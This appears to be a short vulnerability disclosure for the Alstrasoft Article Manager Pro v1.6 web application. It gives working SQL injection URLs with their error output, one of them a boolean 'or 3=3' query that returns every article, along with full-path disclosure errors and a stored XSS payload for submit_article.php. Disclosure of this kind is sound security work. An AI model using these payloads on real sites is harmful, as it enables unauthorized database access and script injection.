Alstrasoft Article Manager Pro v1.6
Alstrasoft Article Manager Pro v1.6 - XSS & Full Path errors
Homepage:
http://www.alstrasoft.com
Description:
Article Manager Pro is the next generation article publishing system designed
to make your life a whole lot easier by enabling webmasters to publish articles
or news into their website in a matter of minutes with our advance WYSIWYG
editor that includes features such as a built-in spell checker, word finder and
many more.
Effected files:
profile.php
userarticles.php
submit_article.php
mraticles.php
admin.php
Exploits & Vulns:
SQL Injection query error
http://www.example.com/article/profile.php?author_id=1'
1064 : You have an error in your SQL syntax. Check the manual that corresponds
to your MySQL server version for
the right syntax to use near '\'' at line 1
SQL Injection:
http://www.example.com/article/userarticles.php?aut_id=3 or 3=3--
Proof Of Concept:
All articles in DB appear on page when the above query is preformed.
Full path errors
http://www.example.com/article/userarticles.php?aut_id=3'
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /home/alstraso/public_html
/article/functions.php on line 212
Invalid user id supplied!
http://www.example.com/article/mrarticles.php?action=read'
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /home/alstraso/public_html
/article/mrarticles.php on line 50
http://www.example.com/article/admin/admin.php?login
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /home/alstraso/public_html
/article/admin/auth.php on line 18
submit_article.php XSS Vuln.
When submitting an article using the submit_article.php file, input is not
filtered. All the user has to do is enter
something like <DIV STYLE="background-image: url(javascript:alert('XSS'))">